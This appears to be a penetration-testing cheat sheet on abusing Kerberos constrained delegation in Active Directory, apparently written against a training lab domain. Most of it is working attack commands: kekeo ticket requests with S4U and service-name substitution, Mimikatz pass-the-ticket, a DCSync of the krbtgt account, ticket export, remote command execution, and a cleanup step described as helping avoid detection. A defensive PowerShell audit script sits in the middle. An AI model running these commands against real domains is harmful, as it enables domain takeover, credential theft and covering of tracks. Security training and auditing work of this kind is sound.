🟢Constrained Delegation
This page walks through Constrained Delegation: how it works, how it is enumerated and abused, and why it matters for an effective system management strategy.
Enumerate users with constrained delegation enabled
Get-DomainUser -TrustedToAuth
Get-DomainUser -TrustedToAuth | select samaccountname, msds-allowedtodelegateto

Enumerate computers with constrained delegation enabled
Get-DomainComputer -TrustedToAuth
Get-DomainComputer -TrustedToAuth | select samaccountname, msds-allowedtodelegateto

Constrained delegation User
Requesting TGT with kekeo
./kekeo.exe
tgt::ask /user:<username> /domain:<domain> /rc4:<hash>

Requesting TGS with kekeo
tgs::s4u /tgt:<tgt> /user:Administrator@<domain> /service:cifs/dcorp-mssql.dollarcorp.moneycorp.local

Use Mimikatz to inject the TGS ticket
Invoke-Mimikatz -Command '"kerberos::ptt <kirbi file>"'

Constrained delegation Computer
Requesting TGT with a PC hash
./kekeo.exe
tgt::ask /user:dcorp-adminsrv$ /domain:<domain> /rc4:<hash>

Requesting TGS
There is no validation of the SPN specified, so an alternative service can be requested for the same host:
tgs::s4u /tgt:<kirbi file> /user:Administrator@<domain> /service:time/dcorp-dc.dollarcorp.moneycorp.LOCAL|ldap/dcorp-dc.dollarcorp.moneycorp.LOCAL

Using mimikatz to inject the TGS ticket and executing DCSync
Invoke-Mimikatz -Command '"kerberos::ptt <kirbi file>"'
Invoke-Mimikatz -Command '"lsadump::dcsync /user:<shortdomain>\krbtgt"'

Additional Enumeration Techniques
Discover objects configured for resource-based constrained delegation (the msDS-AllowedToActOnBehalfOfOtherIdentity attribute is set):
Get-ADObject -LDAPFilter '(msDS-AllowedToActOnBehalfOfOtherIdentity=*)' -Properties msDS-AllowedToActOnBehalfOfOtherIdentity
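The enumeration commands above can be consolidated into a single audit that reports, per account, whether protocol transition is enabled, which hosts the delegation right reaches, whether any of them is a domain controller, and who is allowed in by resource-based constrained delegation. This is an added example, not code from the original page; it assumes the RSAT ActiveDirectory module, read access to the directory, and that the module returns msDS-AllowedToActOnBehalfOfOtherIdentity as an ActiveDirectorySecurity object.

```powershell
# Added example (not from the original page): audit both flavours of constrained
# delegation with the RSAT ActiveDirectory module. Assumes a domain-joined session.
Import-Module ActiveDirectory

# userAccountControl bit for "Use any authentication protocol" (protocol transition).
$TRUSTED_TO_AUTH_FOR_DELEGATION = 0x1000000

# Domain controller hostnames, used to flag delegation rights that reach a DC.
$dcHosts = (Get-ADDomainController -Filter *).HostName

$filter = '(&(|(objectClass=user)(objectClass=computer))' +
          '(|(msDS-AllowedToDelegateTo=*)(msDS-AllowedToActOnBehalfOfOtherIdentity=*)))'
$props  = 'sAMAccountName', 'userAccountControl', 'msDS-AllowedToDelegateTo',
          'msDS-AllowedToActOnBehalfOfOtherIdentity'

Get-ADObject -LDAPFilter $filter -Properties $props | ForEach-Object {
    $obj = $_
    $uac = [int]$obj.userAccountControl

    # Classic constrained delegation: reduce each target SPN (class/host[:port][/name])
    # to its host. The service class is not validated when the ticket is used, so a
    # right to time/host is effectively a right to any service on that host.
    $targetHosts = @($obj.'msDS-AllowedToDelegateTo' |
        ForEach-Object { (($_ -split '/')[1] -split ':')[0] } |
        Sort-Object -Unique)

    # Resource-based constrained delegation: principals allowed to delegate TO this object
    # (assumed: the attribute is exposed as an ActiveDirectorySecurity object).
    $rbcdPrincipals = @()
    if ($obj.'msDS-AllowedToActOnBehalfOfOtherIdentity') {
        $rbcdPrincipals = @($obj.'msDS-AllowedToActOnBehalfOfOtherIdentity'.Access |
            ForEach-Object { $_.IdentityReference.Value })
    }

    [pscustomobject]@{
        Account            = $obj.sAMAccountName
        Class              = $obj.ObjectClass
        ProtocolTransition = ($uac -band $TRUSTED_TO_AUTH_FOR_DELEGATION) -ne 0
        ReachesDC          = [bool]($targetHosts | Where-Object { $dcHosts -contains $_ })
        TargetHosts        = $targetHosts -join ', '
        RbcdAllowedFrom    = $rbcdPrincipals -join ', '
    }
} | Sort-Object ProtocolTransition, ReachesDC -Descending | Format-Table -AutoSize
```

Rows with ProtocolTransition and ReachesDC both true are the ones to review first: any user account in that position can obtain a service ticket for any user to the domain controller.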
Further Exploitation
Extract and Use TGT
Using the extracted TGT for impersonation:
Invoke-Mimikatz -Command '"sekurlsa::tickets /export"'

Then, using the ticket:
Invoke-Mimikatz -Command '"kerberos::ptt <path to .kirbi ticket>"'

Execute Commands with the Impersonated Identity
Once the ticket is injected, use it to execute commands:
Invoke-Command -ComputerName <target> -ScriptBlock { whoami; Get-Process } -Credential $cred

Here $cred is a PSCredential object created with the credentials of the user you have impersonated.
Cleaning Up
Remember to remove any traces of your activities:
Invoke-Mimikatz -Command '"kerberos::purge"'

This ensures the removal of all Kerberos tickets from the current session and helps avoid detection.
Additional Resources
For more information on Kerberos delegation and related attacks, refer to the following resources: